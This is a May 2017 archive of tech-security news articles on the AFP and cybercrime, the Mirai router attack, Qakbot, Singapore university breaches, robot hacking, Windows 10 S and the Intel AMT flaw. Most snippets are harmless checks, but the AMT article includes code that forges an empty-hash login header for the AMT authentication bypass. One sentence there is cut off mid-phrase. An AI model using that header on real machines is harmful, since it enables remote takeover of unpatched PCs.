Monthly archives for May, 2017

Australian Federal Police Commissioner labels cyber a ‘genuinely wicked problem’

The issue of online crime cannot be solved simply by regulation or legislation, the head of the AFP has said.

While the internet is an overwhelming force for positive change, it remains one of the largest asymmetric threats faced, Australian Federal Police (AFP) Commissioner Andrew Colvin said on Wednesday.

“Not only can it be accomplished by a lone actor anywhere in the world, the blurred lines of attribution between criminal, commercial, and state make this a genuinely wicked problem,” he said.

Speaking to the National Press Club, Colvin said the agency would, to an extent, always be playing catch-up in the fight against online crime, and that the problem needed to be solved through partnerships.

“Technology presents challenges to governments like almost never before,” Colvin said. “It is a realm that we cannot simply legislate or regulate to control — we must work with the industry who have their hands on the levers, and invariably, they are in the private sector.”

The Commissioner said cybercrime is pervasive and hits all levels of society.

“We find ourselves in an environment where we are trusting the internet with our personal information, our social networks and — incredibly, when you think about it — our money,” he said.

Colvin called for the use of traditional and non-traditional policing capabilities to ensure criminals cannot hide behind encryption to avoid the law.

“Prolific growth in the use of encryption technology is an everyday reality for investigators and we cannot afford for this to remain an obstacle.”

Despite Colvin’s statement that legislation cannot be a silver bullet, the Federal Police were very supportive of the introduction of Australia’s metadata retention laws. The laws mandate that telecommunications carriers store customers’ call records, location information, IP addresses, billing information, and other data for two years, accessible without a warrant by law-enforcement agencies.

Authorities do need a warrant to access the metadata of a journalist for the purposes of identifying a source, however.

Fronting Senate Estimates last week, Colvin said the AFP does not seek journalist metadata relating to sources as a routine matter, and has made no applications under Australia’s data-retention laws to seek such information.

Even so, the AFP bungled the one occasion on which it did handle a journalist’s metadata, admitting last month to breaching the metadata laws.

The Commonwealth Ombudsman last week found the AFP to be handling metadata in a compliant manner, but noted a number of exceptions.

“We identified two instances where a stored communications warrant had been applied for and subsequently issued in respect of multiple persons, which is not provided for under the Act,” the report said.

In response, the AFP said its warrant templates were not clear enough.

It was also noted that on six occasions, warrants were exercised by people not authorised to do so; in three instances, the Ombudsman could not determine whether stored communications related to the person named on a warrant; and in one instance, it could not determine who had received stored communications from a carrier.


Botnets: Inside the race to stop the most powerful weapon on the internet

How security professionals stopped one botnet attack from getting much worse.

Even one of the simplest forms of cyberattack has the potential to cause catastrophic damage: a large DDoS attack by an army of hijacked devices is capable of knocking networks offline, leaving organisations and their customers unable to access services.

The impact of such an attack was made clear by the Mirai botnet incident late last year. The Mirai botnet used everyday internet-connected devices, such as routers and security cameras, to bring large chunks of the internet to its knees, slowing or outright bringing down popular websites and services.

But that wasn’t the end of Mirai’s malicious intent. Roughly a month later, in late November, a million internet users in Germany were thrown offline as part of a coordinated cyberattack which also impacted the UK, Ireland, Turkey, Iran, and Brazil, among others.

Internet provider Deutsche Telekom bore the brunt of much of the attack within German borders. Matthias Rosche, SVP of solution sales and consulting at Deutsche Telekom’s telecom security group, described it as “the biggest attack” against the company which had a “major” impact on its customer base.

Almost five percent of its 20 million customers suffered internet outages as a result of the botnet attack, which targeted Zyxel and D-Link routers by exploiting an open port. In total, 900,000 routers were affected by the attack.

The attack wasn’t capable of stealing data, but it still created massive problems, resulting in 30 hours of downtime for 900,000 internet connections in homes and businesses across Germany.

“What we saw was that there were specific routers which had issues and problems. Looking at the statistics, we saw that a significant number went down immediately,” Rosche said, speaking at a conference arranged by security company Check Point in Milan.

The malware contained a link used to download malicious software onto the devices in order to connect them to the botnet, but Deutsche Telekom quickly moved to minimise the potential damage of this threat.

“We started to investigate into the attack and figured out there was a download link embedded to upload to malicious software. So the first thing we did was block that to make sure that even if the infection is successful, nothing can be uploaded from that specific link,” said Rosche.

The company’s security team set up a war room to coordinate activities and blocked the targeted open port across the network, ensuring no further attack could exploit it, he explained.
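
Operators can check for this kind of exposure themselves. Here is a minimal sketch in Python; the port number is an assumption on our part (reports at the time pointed to the TR-069 remote-management port, 7547), and the IP address is a placeholder:

```python
import socket

def tcp_port_open(host: str, port: int, timeout: float = 2.0) -> bool:
    """Return True if a TCP connection to host:port can be established."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False

# Check a router's WAN address for an exposed remote-management port.
# 192.0.2.1 is a documentation-only address; substitute your router's IP.
if tcp_port_open("192.0.2.1", 7547):
    print("Port 7547 is reachable -- remote management may be exposed")
else:
    print("Port 7547 is closed or filtered")
```

A port that answers from the WAN side is exactly the kind of foothold the attack relied on; blocking it upstream, as Deutsche Telekom did, removes the attack surface for every customer at once.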

In addition to this, an agreement between Deutsche Telekom and the router vendors meant as soon as the telecoms firm knew how to close the vulnerability, they contacted the vendors and provided them with the information required to update devices and protect them against the botnet.

“Within 12 hours we had a new software version available for our routers,” said Rosche, adding that users were told to turn their routers off and on again to protect themselves from the attack.

“This was a simple patching process and we were happy this was our worst-case scenario,” he said of the incident.

If the attack had been fully successful, the results would’ve been dire and a danger to the internet.

“It’s a simple calculation. We’d have had a new botnet of 1.8 terabits per second, which is big enough to carry out a DDoS attack against any state in the world. This would’ve been the most powerful weapon on the internet, it would have been incredible,” said Rosche.
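
Rosche’s “simple calculation” presumably multiplies the number of compromised routers by a typical consumer upstream rate. A rough sketch of the arithmetic (the 2Mbps per-router figure is our assumption, not from the article):

```python
routers = 900_000          # compromised devices, per Deutsche Telekom
uplink_mbps = 2            # assumed average upstream bandwidth per router

total_mbps = routers * uplink_mbps
total_tbps = total_mbps / 1_000_000
print(f"{total_tbps} Tbps")  # 1.8 Tbps
```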

“We apologised to our customers and the question we had to ask ourselves was, ‘Can we guarantee that this won’t happen again in the future?’ The answer is ‘probably not’. But we’ll be prepared,” he said.


Fresh wave of mutating Qakbot malware brings down enterprise networks

The malware is able to lock out companies from accessing their networks as well as infecting neighboring systems.

The Qakbot malware is making a comeback with a new campaign targeting enterprise players to disrupt operations and lock companies out of their own systems.

On Tuesday, researchers from Cylance said that Qakbot, an information-stealing Trojan and backdoor malware that targets the Microsoft Windows operating system and 64-bit browsers with a particular slant towards business users, is back with a new campaign — and thanks to a re-write from the ground up, is even nastier than before.

Qakbot, also known as Bublik and Qbot, is a self-propagating kind of malware that has been circulating for years. The Trojan can spread not only through networks and external drives and devices but also focuses on stealing valuable credentials and harnessing control of the networks it has infected.

According to Cylance, the resurgent malware has been made even more evasive and persistent with new polymorphic features that enable the malicious code to squat in business networks for longer and “easily thwart legacy endpoint [security] solutions” through obfuscated code and constantly evolving file makeup and signatures.

Cylance says this “seemingly immortal malware” continues to be a thorn in the side of the enterprise due to feature enhancements, multiple obfuscation layers and server-side polymorphism, which allows the malware to mutate rapidly, circumventing signature-based antivirus systems while on the move.
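
Server-side polymorphism defeats signature matching because every downloaded sample hashes differently. A toy illustration of the principle (the byte strings are stand-ins, not real Qakbot samples):

```python
import hashlib

# Two "downloads" of the same malware, differing by one mutated byte.
sample_a = b"MZ\x90\x00" + b"payload" * 100
sample_b = b"MZ\x90\x00" + b"payload" * 99 + b"payl0ad"

sig_a = hashlib.sha256(sample_a).hexdigest()
sig_b = hashlib.sha256(sample_b).hexdigest()

# Functionally identical code, but a hash-based blocklist sees two
# unrelated files: the stored signature for sig_a never matches sig_b.
print(sig_a == sig_b)  # False
```

When the server mutates the file on every request, a signature database can never catch up, which is why Cylance points to behavioural rather than signature-based detection.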

Qakbot infects systems through exploit kits, phishing campaigns, or malicious downloads, but unlike ransomware, it does not lock a system in order to hold a business to ransom.

Instead, Qakbot is able to lock users out of Active Directory: once credentials have been stolen, the malware uses them in repeated authentication attempts against neighboring hosts, disrupting corporate activities. In turn, this may result in the compromise of additional hosts, further spread of the infection, or the lockout of the user accounts tied to those authentication attempts.

“Qakbot continues to be a significant threat due to its credential collection capabilities and polymorphic features,” Cylance says. “Unhindered, this malware family can rapidly propagate through network shares and create an enterprise-wide incident.”

New samples of the malware suggest that Qakbot now also targets victims globally due to the inclusion of international character sets, and a recent surge in attacks means that companies should stay on their guard against suspicious downloads or activity and keep their systems up-to-date to prevent infection.

“While it’s unclear why so many systems have suddenly fallen victim to Qakbot, it’s possible that updated exploit kits play a role,” Cylance says. “After all, there is no shortage of new vulnerabilities and exploits for attackers to use to their advantage.”


Earlier this month, Mac app developers warned that users who have recently downloaded the Handbrake video transcoder app may have been infected with Trojan malware after a download mirror was compromised by cyberattackers.


Singapore university breaches reveal wider attack surface to safeguard

Government’s increasing industry collaboration and research efforts suggest Singapore needs a cybersecurity strategy that goes beyond limiting internet access, as two universities fall prey to APT attacks.

Security breaches this week in Singapore and around the globe reveal the country will have to safeguard a much wider attack surface and need a cybersecurity strategy that goes beyond simply limiting internet access.

It was revealed on Friday that two Singapore universities suffered APT (advanced persistent threat) attacks last month, with the hackers specifically targeting government and research data.

The National University of Singapore (NUS) had detected the intrusion on April 11 when assessments were being carried out by external consultants brought in to boost its cybersecurity posture. Days later on April 19, the Nanyang Technological University (NTU) uncovered its breach during regular checks on its systems.

The universities notified the Cyber Security Agency of Singapore (CSA), the government agency tasked with overseeing the country’s cybersecurity operations, which helped both institutions conduct forensic investigations into the attacks.

CSA determined that the breaches were the result of APT attacks and were “carefully planned and not the work of casual hackers”.

“The objective may be to steal information related to government or research,” the government agency said in a statement Friday, adding that data related to students did not appear to be targeted. Critical IT systems, such as student admissions and databases containing examination documents, also were not affected.

“As the universities’ systems are separate from government IT systems, the extent of the APT activities appear to be limited,” CSA said. The agency said it was helping the universities with incident responses and measures to further mitigate any potential impact, adding that affected desktop computers and workstations at both universities had been removed and replaced.

“We know who did it and we know what they were after, but I cannot reveal [details on] this for operational security reasons,” CSA chief executive David Koh said. The agency also refused to reveal what information the hackers were able to access, but said no classified data was stolen.

It did say, though, that government sectors running critical information infrastructures (CIIs) were informed of the breaches and put on alert. All government bodies and agencies also had been urged to be extra vigilant and beef up checks on their networks.

“There has been no sign of suspicious activity in CII networks or government networks thus far,” CSA said.

In a Facebook post Friday, Singapore’s Minister for Communications and Information Yaacob Ibrahim said the breaches were “a stark reminder that cyber threats are real in Singapore”.

“As we become more digitally connected, such threats will continue to increase in sophistication, and both public and private sector organisations are equally vulnerable,” he said. “Everyone has a role in ensuring cybersecurity. At the individual level, we can and should also do our part to be vigilant, and practise good cyber hygiene.”

The minister is right, of course, but that means the government also needs to realise it cannot choke the pipe to stem the leak when new joints are continuously being added to the pipeline.

In its bid to contain potential data leaks, the Singapore government last June said it was restricting internet access on all computers used by civil servants, affecting an estimated network of 100,000 workstations. Government employees would only have online access via dedicated work terminals or be allowed to browse the web via their own personal mobile devices, since these would have no access to government e-mail systems.

However, as part of its efforts to drive its smart nation initiative, the Singapore government has been actively involved in various data research efforts and has increased its collaboration with industry players. The Land Transport Authority (LTA), for instance, was piloting the use of self-driving buses and conducting research with NTU to improve real-time monitoring of the national rail system.

The National Research Foundation (NRF), a unit under the Prime Minister’s Office, in February also launched a S$8.4 million (US$5.93 million) cybersecurity lab located at NUS to provide a “realistic environment” for cybersecurity research and testing. And just last week, NRF unveiled plans to develop Singapore’s capabilities in artificial intelligence and data science, which would involve several government agencies as well as universities including NTU and NUS.

Its efforts to digitally transform the nation and prep its citizens for a digital economy are commendable and should be further encouraged, but they also expose a significantly wider attack surface for malicious hackers to target.

Adopting a strategy that involves “separating” or “delinking” internet access in the public sector is unlikely to be truly effective in preventing attackers from targeting government data or systems.

As the NTU and NUS breaches demonstrated, “not-so-casual hackers” were more than capable of identifying other entry points and vulnerabilities elsewhere to access government and research data.

What if they were able to get their hands on research NTU was working on with LTA, uncovered information on train operations, and used that to disrupt the national rail system? And they would have achieved that without even having to target or breach LTA’s “internet-less” computer systems.

Worse, touting a strategy based on restricted internet access as a way to stop attackers could lull government employees into a false sense of safety. The government must realise it wouldn’t matter that the universities’ systems were “separate” from government IT systems or that this “limited” the extent of the APT activities.

Amid the flurry of smart nation and digitisation efforts across Singapore, government data as well as valuable research data could reside outside of government systems and within the reach of malicious hackers.

Commenting on the university breaches, LogRhythm’s Asia-Pacific Japan vice president Bill Taylor-Mountford said: “The attack shows that hackers are no longer just targeting the usual suspects in Singapore, such as financial institutions, government, and critical infrastructure. Establishments such as universities hold valuable personal data, including intellectual property that can bring about financial gain.”

Darktrace’s Asia-Pacific managing director Sanjay Aurora concurred, and urged businesses to realise it would be impossible to stop every threat making its way into the network.

Taylor-Mountford added: “Today, we can no longer prevent attackers from gaining access. We are almost fighting a losing battle if we only focus on prevention. It is more important to be able to detect a breach and quickly neutralise it.

“Reducing the mean time to detect and respond must be the key objective for any cybersecurity infrastructure today,” he said.

Aurora touted the need for machine learning and artificial intelligence to better detect APT and other emerging attacks within the network. This would alert systems administrators to anomalies and automate processes, such as isolating compromised systems from the internet, to provide security teams more time to investigate and address the threat, he said.

The massive ransomware infection on Friday that affected more than 70 countries, including the UK, Spain, and Russia, further suggests more such sophisticated and coordinated attacks are on the horizon. And these could shut down critical services such as healthcare, as the UK experienced this week, when the ransomware attacks crippled healthcare systems, forcing hospitals to close emergency rooms and cancel surgeries.

So, it’s no longer a question of “if”, but “when” cyberattacks will hit. The Singapore government clearly knows this, but it now needs to actually believe it and act on it. It would be quite tragic if it decides instead to extend its internet separation tactic beyond the public sector or scale back its industry collaboration.


Now, hackers are targeting internet-connected industrial robots

A new report reveals that industrial robots could easily be hacked.

Instead of speculating about what will happen when robots attack humans, perhaps we should be worried about what could happen if humans attack robots.

Fleets of robots that were originally designed to be isolated in a factory are now connected to the internet and prone to hacking. Tens of thousands of industrial robots aren’t properly protected, according to a new research report by cyber security firm Trend Micro and Italian university Politecnico di Milano.

“These robots have been designed with a lot of focus on physical security, but what this research has shown is that there’s a lot to be done on the cyber-security side,” Mark Nunnikhoven, Trend Micro’s vice president of cloud research, told ZDNet.

New cloud capabilities are convenient for robot operators and hackers alike. While many companies have prioritized cyber-security for protecting data on computers and internal networks, equivalent vulnerabilities in industrial robots have been overlooked.

“It’s a pattern we’ve seen in different industries and in different verticals,” Nunnikhoven said. “Robots were designed with an original concept for their deployment and that concept and those constraints no longer hold true.”

When the first industrial robot was introduced to a General Motors assembly line in 1961, it followed a series of steps to weld car parts. It was big, strong, and potentially destructive. For this reason, industrial robots were caged so they couldn’t accidentally harm any nearby people or products. Today’s robots are more agile and precise — but what would happen if someone messed with the controls?

Robot hackers could steal trade secrets or cause operator injuries, but a more likely scenario is that state-sponsored or corporate interests would cause a manufacturing disruption. The new report reveals what could happen if a hacker altered a controller’s parameters or tampered with the production logic. Even a slight change could result in defective products.

To see how this scenario might play out, the researchers adjusted an industrial robot’s parameters to convince it that it was drawing a straight line when it was actually drawing a very slight curve. Even by introducing a two-millimeter defect, a hacker could cause an expensive manufacturing disruption. A scarier scenario is that the error would go unnoticed because an automated quality control check would confirm that the robot followed its parameters.
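
The researchers’ straight-line experiment can be sketched numerically. Here a tiny attacker-injected curvature parameter bows a commanded 500mm straight path by roughly two millimeters at its midpoint; all figures are illustrative, not taken from the report:

```python
def deviation(x: float, length: float, bend: float) -> float:
    """Lateral deviation (mm) of a tampered 'straight' path at position x."""
    return bend * x * (length - x)

LENGTH = 500.0   # commanded straight weld, in mm
BEND = 3.2e-5    # tiny injected curvature parameter (1/mm)

max_dev = max(deviation(x, LENGTH, BEND) for x in range(int(LENGTH) + 1))
print(f"max deviation: {max_dev:.1f} mm")  # max deviation: 2.0 mm
```

The controller still reports that it executed its programmed path, which is why an automated quality check against those same parameters would raise no alarm.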

“But if that robot was programmed to weld something like a car chassis or a wing for an airplane, that could be an absolutely catastrophic outcome,” Nunnikhoven points out. Previous research has shown that even a small defect in a rotor can make a drone drop to the ground mid-flight.

While drones are mostly used for recreation, military missions, or infrastructure inspections, industrial robots build a wide variety of products. They are used in aerospace, automotive, pharmaceutical, and electronics manufacturing (and just about everything in between).

The report focuses on industrial robots, but the conclusions also apply to automation and the Internet of Things on a broader level.

“[Industrial robots] were intended to be used in isolation and never to be connected to the outside world and we found that it’s not true anymore,” Nunnikhoven explains. “They’re connected to both inside networks and the internet, so there’s a risk profile that hasn’t really been considered.”

“And while some of the motivations are different than our normal cyber-attacks, the consequences are significantly more real. There are definitely consequences in the physical world, and that’s something very different than what we’re used to seeing, where data is destroyed or held for ransom,” he said.

“This involves risk to real people, and real physical risks, not just financial risk or reputational risk,” he added.


Why Windows must die. For the third time

Microsoft knows Windows is obsolete. Here’s a sneak peek at its replacement.

Last week, a key event occurred in the history of personal computing. It marks the beginning of the death of the operating system that we recognize today as Microsoft Windows.

This euthanizing of Windows has been planned for at least five years, and Microsoft knows that it is necessary for the company’s software business and for the PC industry to evolve and stay healthy.

In order for the Windows brand and Microsoft’s software business to live, Windows — as it exists today — must die.

It is important we have some historical perspective of what “death” actually means for Windows, because it’s already happened twice.

The first of Windows’ lives occurred in the period between 1985 and 1995. During this time, Windows was a bolt-on application execution environment that ran on top of the 16-bit DOS operating system, which was introduced with the original IBM PC in 1981.

That OS “died” in 1995, when Windows 95 — the first 32-bit version of the OS — was released.

From 1989 to 2001, on a separate track, Microsoft also developed Windows NT, a 32-bit, hardware-abstracted, fully pre-emptive, protected-memory, multi-threaded multitasking OS designed for high-performance RISC and x86 workstations and servers.

What the consumer version of Windows and Windows NT had in common was that they shared many of the same APIs, collectively known as Win32.

Largely implemented using the C programming language, Win32 became the predominant Windows application programming model for many years. The majority of legacy Windows applications that exist in the wild today still use Win32 in some form. (This is an important takeaway that we will return to shortly.)

In 2001, Windows NT (at that time branded as Windows 2000) and the consumer version of Windows (Windows ME) merged into a single product: Windows XP.

Thus, the second generation of Windows technology descended from Windows 95 “died” at this time.

Shortly after the release of Windows XP, in 2002, Microsoft introduced the .NET Framework, which is an object-oriented development framework that includes the C# programming language.

The .NET Framework was intended to replace the legacy Win32. It has continued to evolve and has been slowly adopted by third-party ISVs and development shops. Over the years, Microsoft has adopted it internally for the development of Office 365, Skype, and other applications.

That was 15 years ago. However, Win32 is still the predominant legacy programming API. More apps out in the wild use it than anything else. And that subsystem remains the most significant vector for malware and security threats because it hosts desktop-based browsers, such as Internet Explorer and Chrome.

A lot has changed in the technology industry in those 15 years, especially the internet. Web standards have changed, as have the complexity and sophistication of security threats. More and more applications are now web-based or are hosted as SaaS using web APIs.

Microsoft introduced a new programmatic model with the introduction of the Windows 8 OS. That framework, which is now commonly known as Universal Windows Platform (UWP), is a fully modernized programming environment that takes advantage of all the new security advancements introduced since Windows 8 and that are in the current Windows 10.

While Windows 8 was not well-received in the marketplace because of its unfamiliar full-screen “Metro” UX, the actual programmatic model that it introduced, which was greatly improved for desktop-style windowing in Windows 10, is technically sound and much more secure than Win32 due to its ability to sandbox apps.

In addition to including the latest implementation of .NET, UWP also allows apps to be programmed in C++, C#, Objective-C, VB.NET, and JavaScript. It uses XAML as a presentation stack to reduce code complexity.

Microsoft Edge, the completely re-designed browser that was introduced in Windows 10, is a native UWP application with none of the security drawbacks of Internet Explorer. Other native UWP applications include Windows Mail, Skype for Windows 10, and some of the applications in the Windows Store.

It could be said that the third Windows death, the end of the Win32 API, is long overdue. It has existed in some form or another since at least the late 1980s. But what has been keeping it alive?

Some of it is developer laziness. It’s not like they haven’t had 15 years to learn and adopt .NET and the past five years to adopt Metro/Modern/UWP.

To be fair, many of them have incorporated certain aspects of .NET into their apps as they kicked the can with their legacy codebase down the road, such as with the use of Windows Presentation Foundation (WPF) in .NET 3.0. But in a lot of cases, fully migrating code bases to UWP from Win32 would mean complete re-implementation.

That takes time and money.

Not all of this is developer laziness; it’s also the systemically bad end-user and IT organizational habit of keeping old versions of apps around rather than moving to newer licensing models and newer versions of the apps.

These legacy apps, many of which are still running long past their last service pack, their end-of-life notices, and ISV recommendations to decommission them, are of course far more susceptible to security threats.

A lot of ISVs are going the SaaS and web app route, or are providing their legacy apps in hosted desktop environments while they develop modernized web and SaaS apps to replace them.

Win32’s persistence on extended life support puts Microsoft in a bad situation.

So what kind of shape is UWP in today? Is it ready for developers to move to as a complete replacement programming model for Win32?

With Windows 10 and UWP, the company finally has a modernized OS that is ready to host the desktop and mobile application workloads of the 21st century. It’s secure and it finally makes good on the company’s Trustworthy Computing initiative that it began in 2002.

A lot has changed over the last five years since the original Metro/WinRT programming stack was introduced with Windows 8.

Indeed, many of the API changes have not been rolled out in a developer-friendly fashion and a lot of the applications currently delivered in the Windows Store are based on older API versions and are not “universal” by any stretch.

That being said, the current implementation of UWP is quite good, and anything written to it will run on any architecture that UWP runs on, which includes all the versions of Windows 10, the Xbox One, and the HoloLens.

There aren’t many notable examples yet, but if you have a Windows 10 Mobile phone, which runs on ARM, and a Windows 10 PC, which runs on x86, and you buy a UWP app from the Windows Store, the developer has the option of offering a single app that runs on both, using the same code.

My preferred Twitter client, Tweetium, is one of these — so are the built-in Mail and Calendar apps on Windows 10.

The more web standards you incorporate into your UWP apps, and the more code that executes directly in the cloud, the more portable, lightweight, and mobile your code becomes.

Unfortunately, Windows 10’s advanced security model has one weak spot: running legacy apps on it. That’s the double-edged sword of backward compatibility.

Microsoft’s only choice to move forward is to throw the Win32 baby out with the bathwater. And that brings us to the introduction of Windows 10 S.

Windows 10 S is just like the Windows 10 you use now, but the main difference is it can only run apps that have been whitelisted to run in the Windows Store. That means, by and large, existing Win32-based stuff cannot run in Windows 10 S for security reasons.

To bridge the app gap, Microsoft is allowing certain kinds of desktop apps to be “packaged” for use in the Windows Store through a tooling process known as Desktop Bridge or Project Centennial.

The good news is that with Project Centennial, many Desktop Win32 apps can be re-purposed and packaged to take advantage of Windows 10’s improved security. However, there are apps that will inevitably be left behind because they violate the sandboxing rules that are needed to make the technology work in a secure fashion.


One of the key benefits of Centennial apps is that even though they run with normal user privileges, they still take advantage of some OS isolation so they can be seamlessly removed from the device. They are packaged/compartmentalized and are updated directly from the Windows Store (which helps to avoid “Windows rot”).

Win32 apps put a tremendous drag on the developer ecosystem — and Centennial is a straightforward and easy step toward removing that drag. For application developers, it also provides great analytics tools for software distribution to various markets.

Centennial is also an acknowledgment on Microsoft’s part that Win32 apps are here to stay and developers aren’t going to move off of them wholesale. Instead, it gives developers the ability to take baby steps with their application and get them into the Windows Store (which in turn helps Microsoft, because it makes the store ecosystem more relevant to customers).

Some Win32 apps can probably be remediated for Centennial easily, some cannot. The more legacy an app codebase is, the worse shape it is probably in.

A casualty of those sandboxing rules is Google’s Chrome browser. For security reasons, Microsoft is not permitting desktop browsers to be ported to the Store. In theory, Google could build its own compatible UWP browser, but it would bear little resemblance to Chrome on the desktop. The default browser, for now, is Microsoft Edge, period.

As it stands, you also can’t change the default search engine to Google from Bing either. All of this is done under the auspices of improved security.

Obviously, not everyone is going to be able to run an OS like Windows 10 S overnight. So Microsoft is using the Surface Laptop and other low-cost OEM systems in the $200 to $300 range as a trial balloon for the end-user market.

Who is Microsoft targeting? Education and Home users and those who mostly use the browser to do daily tasks and don’t use legacy desktop-based line of business applications. That’s the exact same demographic that Google is targeting with Chrome OS.

You can accuse Microsoft of many things, but resting on its laurels and being risk-averse is not one of them. There’s a lot of risk in releasing a version of Windows and accompanying systems that cannot run a preponderance of legacy Windows applications out of the box.

However, the reward, if successful, will be tremendous. Not just for Microsoft itself but also for the end-users that will have a much more secure computing experience to show for it.

There is clearly much more work that has to occur to ditch Win32 beyond getting the majority of users on a Windows OS that doesn’t run legacy code.

Microsoft needs to build modernized versions of Office in order for enterprises to move, for starters. And we are years out from that becoming the desired deployment model for Office, even if Microsoft wanted the next version of 365 to be UWP-based, which we presume it does.

To realize that endgame, the other half of the future Windows OS, the half end-users don’t see, has to mature. And that’s Azure.

I like to think of this as the boring of an undersea tunnel, like the one built between England and France. One half is the modern, security-enhanced version of Windows 10 that runs only UWP and Centennial apps. The other is the cloud back-end that makes much of it possible.

Like boring out that undersea tunnel, at some point the tunneling machines will eventually meet in the middle.

Today, Office 365 is deployed as “Click-to-Run” desktop code, an application packaging technology derived from App-V, a virtualization technology also referred to as application sequencing.

The Office client applications are also updated every month as part of your Office 365 subscription, so as long as you don’t turn updates off, you are always running the most current version of Office.

But it still all executes locally on the device. It is not hosted remotely, like Citrix, nor is it a web app.

How does Click-to-Run get around the problem that the installer is Win32? It copies the sequence of files that gets installed, but that doesn’t change the fact that the Office code that runs is still Win32.

Third-party installer tools that developers already use can also create Centennial-compatible app packages.

All Windows 10 users can still get a lot done out of the box because the web-based Office Online already runs well in Edge. You can be reasonably productive in a business environment using strictly those apps, especially if you need to share and collaborate on Office docs with other people.

There are definitely some limitations but I would say for at least 50 percent of workers who use Office on a day to day basis, the web versions of the Office apps get the job done.

Surface Laptop owners will get a free one-year Office 365 subscription that will work with the Office desktop software pre-loaded onto their devices and updated from the Store. Qualifying educational customers, who have free licenses of Office 365 for Education, will also be able to use that desktop app with their Office subscription. In fact, anyone with an Office 365 subscription, using any edition of Windows 10, can use that Store app.

Today, the Click-to-Run/App-V software distribution technology is tied largely to the x86 platform because of the way desktop apps are written. But UWP apps don’t have this limitation; they can run on Windows 10 Mobile, or in theory, a Windows 10 PC running on an ARM processor.

Those types of ARM-based systems don’t exist today. The original Surface RT, which was an early attempt at this, failed. It was also underpowered, which didn’t help.

But in a few years, they could return, because Microsoft has done all of the hard work since its Windows 8 mishaps to undergo full platform convergence.

The ARM architectural licensees like Qualcomm, Samsung, TSMC, Nvidia, Huawei, and others now manufacture powerful, 64-bit, multi-core SoCs that have plenty of CPU and RAM headroom as well as fast bus speeds to run an OS like Windows 10 S easily.

As Microsoft’s Azure cloud evolves and the 365 Online offerings become more and more sophisticated, more apps using web APIs can be wrapped as UWP. This also goes for third-party web apps, including Google’s, if the developers put some minimal effort into optimizing their web apps for the Edge rendering engine.

Just take a look at Kiwi for Gmail, which a single, third-party developer wrote. No Chrome engine or desktop code required. It makes all the Google apps look like modern Windows apps. A company with Google’s resources could certainly make UWP apps look very polished indeed. Whether it’s actually willing to is another matter altogether, due to its own desire to control its application ecosystem and userbase.

There will be less and less need for legacy desktop apps running on client devices, particularly when legacy code can be isolated in Azure using virtual machines and containers for improved security. That’s where stuff like XenApp Essentials and XenDesktop Essentials by Citrix and other third-party desktop hosting technologies like IndependenceIT come in.

It also wouldn’t surprise me to see some type of Windows container technology deployed directly on the client device in a future version of Windows 10 S, so that UWP and Centennial apps can be totally isolated from each other, a la Bromium.

Windows, as we know it today, based on the legacy Win32 APIs that have been around for decades, will die. That’s Microsoft’s intention as well as its current mission to improve the overall computing experience for everyone. But Windows as a brand will continue, as a secure operating system optimized for applications that heavily leverage public and private clouds.

However, our definition of personal computing, and of the PC itself, will change with it.


Intel chip vulnerability lets hackers easily hijack fleets of PCs

Security researchers say exploiting the vulnerability requires little technical
expertise, and can result in a hacker taking full control of an affected PC.

A vulnerability in Intel chips that went undiscovered for almost a decade allows
hackers to remotely gain full control over affected Windows PCs without needing a
password.

The “critical”-rated bug, disclosed by Intel last week, lies in a feature of Intel’s
Active Management Technology (more commonly known as just AMT), which allows IT
administrators to remotely carry out maintenance and other tasks on entire fleets of
computers, such as pushing software updates and wiping hard drives, as if they were
there in person. AMT also allows the administrator to remotely control the computer’s
keyboard and mouse, even if the PC is powered off.

To make life easier, AMT was also made available through a web interface, accessible
even when the remote PC is asleep, that is protected by a password set by the admin.

The problem is that a hacker can enter a blank password and still get into the web
console, according to independent technical rundowns of the flaw by two security
research labs.

Embedi researchers, credited with finding the bug, explained in a whitepaper posted
Friday that a flaw in how the web interface’s default “admin” account processes
passwords effectively lets anyone log in by entering nothing at the log-on prompt.
“No doubt it’s just a programmer’s mistake, but here it is: keep silence when
challenged and you’re in,” said the researchers.

Tenable researchers confirmed the findings in a detailed analysis of the flaw, also
posted Friday, saying it was relatively easy to remotely exploit.
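The bypass the researchers describe can be sketched concretely. Vulnerable AMT firmware reportedly compared the user-supplied digest hash against the computed one using only as many characters as the user supplied, so an empty `response` field passes the check. This is a minimal illustration of the forged header; the realm, nonce, and URI values are placeholders of mine, not taken from a real device:

```python
def forge_amt_digest_header(username="admin",
                            realm="Digest:0000000000000000",  # placeholder
                            nonce="placeholder-nonce",         # placeholder
                            uri="/index.htm"):
    """Build a Digest Authorization header with an empty response hash.

    Against vulnerable firmware, the server effectively runs
    strncmp(user_hash, real_hash, strlen(user_hash)); an empty user
    hash compares zero bytes, which always succeeds.
    """
    return ('Digest username="%s", realm="%s", nonce="%s", '
            'uri="%s", response=""' % (username, realm, nonce, uri))

header = forge_amt_digest_header()
print(header)
```

A client would send this as the `Authorization` header on a request to the AMT web console; patched firmware rejects the empty hash instead of short-circuiting the comparison.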

Intel’s advisory said that systems — including desktops, laptops, and servers —
dating back as early as 2010 and 2011 and running firmware 6.0 and later are affected
by the flaw.

But Embedi warned that any affected internet-facing device with ports 16992 and
16993 open is at risk. “Access to ports 16992/16993 are the only requirement to
perform a successful attack,” said the Embedi researchers.
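Since an open 16992 or 16993 is the tell, a plain TCP connect is enough for a first-pass check of your own hosts. A minimal sketch (the two-second timeout is an arbitrary choice of mine):

```python
import socket

AMT_PORTS = (16992, 16993)  # AMT web console over HTTP and HTTPS

def port_open(host, port, timeout=2.0):
    """Return True if a TCP connection to host:port succeeds."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False

def amt_exposed(host):
    """A host with either AMT port reachable warrants investigation."""
    return any(port_open(host, p) for p in AMT_PORTS)
```

A reachable port alone doesn't prove the firmware is vulnerable; Intel's own discovery tool checks the actual firmware version.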

Since the disclosure, monitors have seen a spike in probing activity on the two
affected ports.

Intel so far hasn’t said how many devices are affected.

However, a search on Shodan, the search engine for open ports and databases, shows
more than 8,500 devices are vulnerable at the time of writing, with almost 3,000 in
the US alone — but there could be thousands more devices at risk on internal

In a statement, Intel said that it’s working with its hardware partners to address
the problem, and “expect[s] computer-makers to make updates available beginning the
week of May 8 and continuing thereafter.”

So far, Dell, Fujitsu, HP, and Lenovo have all issued security advisories and
guidance on when they will roll out fixes to their customers. Consumer devices aren’t
affected by the bug.

The chipmaker has also published a discovery tool to determine if machines are
affected.


Leaked document reveals UK plans for wider internet surveillance

